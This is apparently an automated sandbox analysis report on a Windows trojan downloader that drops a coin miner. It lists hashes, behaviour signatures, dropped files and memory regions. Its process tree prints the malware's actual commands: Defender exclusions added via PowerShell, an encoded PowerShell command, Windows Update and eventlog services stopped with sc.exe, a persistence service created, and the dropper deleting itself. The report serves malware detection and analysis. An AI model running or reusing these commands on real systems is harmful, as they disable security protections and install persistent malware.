Analysis

  • max time kernel
    86s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2024, 15:35

Errors

Reason
Machine shutdown

General

  • Target

    SecuriteInfo.com.Trojan.DownLoader45.1081.7048.8713.exe

  • Size

    5.3MB

  • MD5

    b59631e064541c8651576128708e50f9

  • SHA1

    7aae996d4990f37a48288fa5f15a7889c3ff49b3

  • SHA256

    4e5fcc788287580ed19402eadaab8c69ca5f0a904ead605153feb534bbe87002

  • SHA512

    571a06f0ec88fe3697388195dd0a7f7e8d63945748855d928fb5005b51fd2c2baea1a63bd871ed0cfade5eabb879f577b7b04f9cd4d1222de52da641feee1f92

  • SSDEEP

    98304:69w8PMOW9ZI6aO7sd/mzt5mAiN1vw+/YR8ov/bkMJmJZNOnTdjyip:ndIV0G/mzsN1vl/YRV4MY9OnTdjy

Score
8/10

Malware Config

Signatures

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 9 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:376
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:672
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:972
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:760
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
            1⤵
              PID:612
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:60
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1092
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1200
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1240
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1300
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1312
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1324
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1428
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1472
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:4640
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2868
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:4344
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2688
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:4176
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:2188
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              1⤵
                                                PID:1512
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                1⤵
                                                  PID:1528
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                  1⤵
                                                    PID:1648
                                                  • C:\Windows\sysmon.exe
                                                    C:\Windows\sysmon.exe
                                                    1⤵
                                                      PID:2696
                                                    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.1081.7048.8713.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.1081.7048.8713.exe"
                                                      1⤵
                                                      • Checks computer location settings
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:728
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZwBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAaABlACMAPgA="
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1556
                                                      • C:\Users\Admin\AppData\Roaming\Miner.exe
                                                        "C:\Users\Admin\AppData\Roaming\Miner.exe"
                                                        2⤵
                                                        • Drops file in Drivers directory
                                                        • Executes dropped EXE
                                                        • Drops file in System32 directory
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2604
                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                          3⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3024
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                          3⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4064
                                                          • C:\Windows\system32\wusa.exe
                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                            4⤵
                                                              PID:4296
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:4640
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:1968
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:4224
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe stop bits
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:1700
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe stop dosvc
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:2356
                                                          • C:\Windows\system32\dialer.exe
                                                            C:\Windows\system32\dialer.exe
                                                            3⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1544
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe delete "RYVSUJUA"
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:1676
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe create "RYVSUJUA" binpath= "C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe" start= "auto"
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:4036
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe stop eventlog
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:5052
                                                          • C:\Windows\system32\sc.exe
                                                            C:\Windows\system32\sc.exe start "RYVSUJUA"
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:1944
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Miner.exe"
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1812
                                                            • C:\Windows\system32\choice.exe
                                                              choice /C Y /N /D Y /T 3
                                                              4⤵
                                                                PID:4064
                                                          • C:\Users\Admin\AppData\Roaming\Shortcutter.exe
                                                            "C:\Users\Admin\AppData\Roaming\Shortcutter.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2476
                                                        • C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
                                                          C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:728
                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            2⤵
                                                            • Modifies data under HKEY_USERS
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4228
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3940 --field-trial-handle=2588,i,4353937220825226770,7138584070663735671,262144 --variations-seed-version /prefetch:8
                                                          1⤵
                                                            PID:5000

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe

                                                            Filesize

                                                            2.4MB

                                                            MD5

                                                            c405fcda0019ff6e962c0681cac1de22

                                                            SHA1

                                                            de1ac2dae596ae14178aa7ecd49a62a869201a5b

                                                            SHA256

                                                            208021d077b60c3f16a5d42b800c48b7c4cf046baaee9383de2d6bb27b48970f

                                                            SHA512

                                                            b49a73100104a21752f691eeddf99f62fcf70b49047acfd12f7b7569716223c53eabb284a1c0ba291f86d5ac4d504f20956d88194f3fac343be46ce5acccbd69

                                                          • C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe

                                                            Filesize

                                                            2.6MB

                                                            MD5

                                                            d529f7ff12da092226af78e409621acb

                                                            SHA1

                                                            0b6bdbd86a3ff2d9f2af152a26f95e05f07ef2c8

                                                            SHA256

                                                            fce4139d84d30095c0e8fa0c6493270bccb8880806b317c38f0db53928a7558f

                                                            SHA512

                                                            9e0f66450dbdb071006769c9b0509800895431edc8af9228938b882b7e45b45cea841bf9bdfab0300a8035930d7e56e71029e6adfeb034c1b6d35a8595bc320e

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpyohyjq.qyg.ps1

                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                          • C:\Users\Admin\AppData\Roaming\Miner.exe

                                                            Filesize

                                                            4.2MB

                                                            MD5

                                                            18e0719c5160aca0ec97ecfb8f037214

                                                            SHA1

                                                            9a33e0f935159767421ffa38e7de3ef51708a548

                                                            SHA256

                                                            ab13133c9fb26e9898a1b2dae447fcfa16282d293d8a0656cd0e855fce6f08c4

                                                            SHA512

                                                            04f092327fca01db17c772b8c4353abc0d626c91931a6adb356116c236e83416a25b92d581e7abc6c40082ba7220e6bb49a0d0669d1f767622aaba9c6a38b588

                                                          • C:\Users\Admin\AppData\Roaming\Miner.exe

                                                            Filesize

                                                            5.1MB

                                                            MD5

                                                            825fea115a2fa7a09a46ed2e7f05bed8

                                                            SHA1

                                                            92bf63767d2f6bb70c0e07e209c20c72d8958aaa

                                                            SHA256

                                                            369ffcc8bc93d19341beaef43a75f164108172a1c836e279d08eb8f084fa87ef

                                                            SHA512

                                                            3221a052683a0be4ed7fcaf6d4db05b117017baa5a9edb75682307e05ba73fd964032260e070a3aae834012f6675bd2a6fff42971fd3e1e5b23196ae4ffa8578

                                                          • C:\Users\Admin\AppData\Roaming\Miner.exe

                                                            Filesize

                                                            4.1MB

                                                            MD5

                                                            56de2445265075618649d5023323abd1

                                                            SHA1

                                                            c5edee36255209f256ed39b905c183d8d53139e1

                                                            SHA256

                                                            300fc1fdb52bae12567dcc68102d519344cd9f1f2380fe851a7c272d89967643

                                                            SHA512

                                                            1088937fbdd47cd673a682afcc9a3cfb3ec385a126be4787c44b76cedb42426ff5edf6a3329537d910305951fa4e0188b8c30a65c2626c6a6b5a042dd6a94a75

                                                          • C:\Users\Admin\AppData\Roaming\Shortcutter.exe

                                                            Filesize

                                                            50KB

                                                            MD5

                                                            4ce8fc5016e97f84dadaf983cca845f2

                                                            SHA1

                                                            0d6fb5a16442cf393d5658a9f40d2501d8fd725c

                                                            SHA256

                                                            f4da7f22e8eb28cfd8ecb0c3fdc8923b2ba5c5e96b917cbcf53b6bbed1c22551

                                                            SHA512

                                                            4adeb4774ca136a085bc92cf6f02aa340f927ae12e1db90e8a2be69ef045611d333904ef5714c876ab03f8bcc52ee0140e724bd1659b9cf9eacf0a7d6a7bdd46

                                                          • C:\Windows\System32\catroot2\dberr.txt

                                                            Filesize

                                                            19KB

                                                            MD5

                                                            0fa99f49aae57bdda9656c9491559ace

                                                            SHA1

                                                            7e1f8341e5b6e1d4d0821a30446482bad3e30d71

                                                            SHA256

                                                            7b43d74c306311cabe0903e691a38c68a076893580f25a9fdc24352c050100a8

                                                            SHA512

                                                            53260d7dc0fb63764579307a780ab57922e3b665487126a5eb9b954cfaa7ccfb936b982bff8f66013c939cc6e00f170e9ece121238d942dcf26dc8840cddc42b

                                                          • memory/60-141-0x0000027E52730000-0x0000027E5275B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/60-193-0x0000027E52730000-0x0000027E5275B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/60-140-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/60-137-0x0000027E52730000-0x0000027E5275B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/376-130-0x00007FFECA88C000-0x00007FFECA88D000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/376-111-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/376-108-0x0000022973980000-0x00000229739AB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/376-128-0x0000022973980000-0x00000229739AB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/612-124-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/612-121-0x0000016222940000-0x000001622296B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/612-132-0x0000016222940000-0x000001622296B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/616-96-0x0000023D94CF0000-0x0000023D94D14000-memory.dmp

                                                            Filesize

                                                            144KB

                                                          • memory/616-98-0x0000023D950C0000-0x0000023D950EB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/616-110-0x00007FFECA88D000-0x00007FFECA88E000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/616-105-0x0000023D950C0000-0x0000023D950EB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/616-198-0x0000023D950C0000-0x0000023D950EB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/672-117-0x00007FFECA88D000-0x00007FFECA88E000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/672-123-0x00007FFECA88F000-0x00007FFECA890000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/672-100-0x00000164264F0000-0x000001642651B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/672-135-0x00000164264F0000-0x000001642651B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/672-102-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/760-122-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/760-131-0x00000271A3460000-0x00000271A348B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/760-116-0x00000271A3460000-0x00000271A348B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/972-113-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/972-126-0x00000209585B0000-0x00000209585DB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/972-107-0x00000209585B0000-0x00000209585DB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1084-142-0x0000013033660000-0x000001303368B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1084-145-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1092-148-0x000001D052460000-0x000001D05248B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1092-150-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1200-155-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1200-152-0x0000012FAB230000-0x0000012FAB25B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1240-153-0x0000021E5F3B0000-0x0000021E5F3DB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1240-157-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1300-174-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1300-173-0x0000020B04680000-0x0000020B046AB000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1312-178-0x0000023D0B6F0000-0x0000023D0B71B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1312-175-0x0000023D0B6F0000-0x0000023D0B71B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1312-177-0x00007FFE8A870000-0x00007FFE8A880000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1324-183-0x00000216A1400000-0x00000216A142B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1324-199-0x00000216A1400000-0x00000216A142B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1428-206-0x000002700D560000-0x000002700D58B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1544-87-0x0000000140000000-0x000000014002B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1544-93-0x0000000140000000-0x000000014002B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1544-84-0x0000000140000000-0x000000014002B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1544-83-0x0000000140000000-0x000000014002B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1544-82-0x0000000140000000-0x000000014002B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1544-85-0x0000000140000000-0x000000014002B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1544-89-0x00007FFEC9FA0000-0x00007FFECA05E000-memory.dmp

                                                            Filesize

                                                            760KB

                                                          • memory/1544-88-0x00007FFECA7F0000-0x00007FFECA9E5000-memory.dmp

                                                            Filesize

                                                            2.0MB

                                                          • memory/1556-103-0x0000000002860000-0x0000000002870000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1556-22-0x0000000002860000-0x0000000002870000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1556-78-0x00000000072D0000-0x0000000007366000-memory.dmp

                                                            Filesize

                                                            600KB

                                                          • memory/1556-45-0x00000000747A0000-0x00000000747EC000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/1556-44-0x0000000006EE0000-0x0000000006F12000-memory.dmp

                                                            Filesize

                                                            200KB

                                                          • memory/1556-43-0x000000007F100000-0x000000007F110000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1556-42-0x0000000002860000-0x0000000002870000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1556-56-0x0000000006F20000-0x0000000006FC3000-memory.dmp

                                                            Filesize

                                                            652KB

                                                          • memory/1556-20-0x0000000002760000-0x0000000002796000-memory.dmp

                                                            Filesize

                                                            216KB

                                                          • memory/1556-80-0x0000000007270000-0x0000000007281000-memory.dmp

                                                            Filesize

                                                            68KB

                                                          • memory/1556-90-0x00000000072A0000-0x00000000072AE000-memory.dmp

                                                            Filesize

                                                            56KB

                                                          • memory/1556-41-0x0000000006110000-0x000000000615C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/1556-129-0x0000000005D60000-0x0000000005D68000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/1556-40-0x0000000005CB0000-0x0000000005CCE000-memory.dmp

                                                            Filesize

                                                            120KB

                                                          • memory/1556-38-0x0000000005840000-0x0000000005B94000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/1556-28-0x00000000056C0000-0x0000000005726000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/1556-27-0x0000000005650000-0x00000000056B6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/1556-119-0x0000000005D70000-0x0000000005D8A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/1556-26-0x0000000004D50000-0x0000000004D72000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/1556-114-0x00000000731B0000-0x0000000073960000-memory.dmp

                                                            Filesize

                                                            7.7MB

                                                          • memory/1556-25-0x00000000731B0000-0x0000000073960000-memory.dmp

                                                            Filesize

                                                            7.7MB

                                                          • memory/1556-24-0x0000000004F00000-0x0000000005528000-memory.dmp

                                                            Filesize

                                                            6.2MB

                                                          • memory/1556-91-0x00000000072B0000-0x00000000072C4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/1556-55-0x00000000062E0000-0x00000000062FE000-memory.dmp

                                                            Filesize

                                                            120KB

                                                          • memory/1556-73-0x00000000070B0000-0x00000000070BA000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/1556-156-0x0000000002860000-0x0000000002870000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1556-68-0x0000000007680000-0x0000000007CFA000-memory.dmp

                                                            Filesize

                                                            6.5MB

                                                          • memory/1556-160-0x000000007F100000-0x000000007F110000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1556-71-0x0000000007040000-0x000000000705A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/2476-74-0x00007FFEAA1C0000-0x00007FFEAAC81000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/2476-19-0x000002147C760000-0x000002147C772000-memory.dmp

                                                            Filesize

                                                            72KB

                                                          • memory/2476-21-0x00007FFEAA1C0000-0x00007FFEAAC81000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/2476-101-0x000002147E550000-0x000002147E560000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/2476-23-0x000002147E550000-0x000002147E560000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3024-79-0x00007FFEAA1C0000-0x00007FFEAAC81000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3024-75-0x000001D176440000-0x000001D176450000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3024-69-0x000001D176440000-0x000001D176450000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3024-57-0x00007FFEAA1C0000-0x00007FFEAAC81000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3024-72-0x000001D176440000-0x000001D176450000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3024-70-0x000001D176440000-0x000001D176450000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3024-63-0x000001D177D80000-0x000001D177DA2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/4228-180-0x0000029F9E1B0000-0x0000029F9E1C0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/4228-138-0x00007FFEAA1C0000-0x00007FFEAAC81000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4228-187-0x00007FFEAA1C0000-0x00007FFEAAC81000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4228-133-0x0000029F9E1B0000-0x0000029F9E1C0000-memory.dmp

                                                            Filesize

                                                            64KB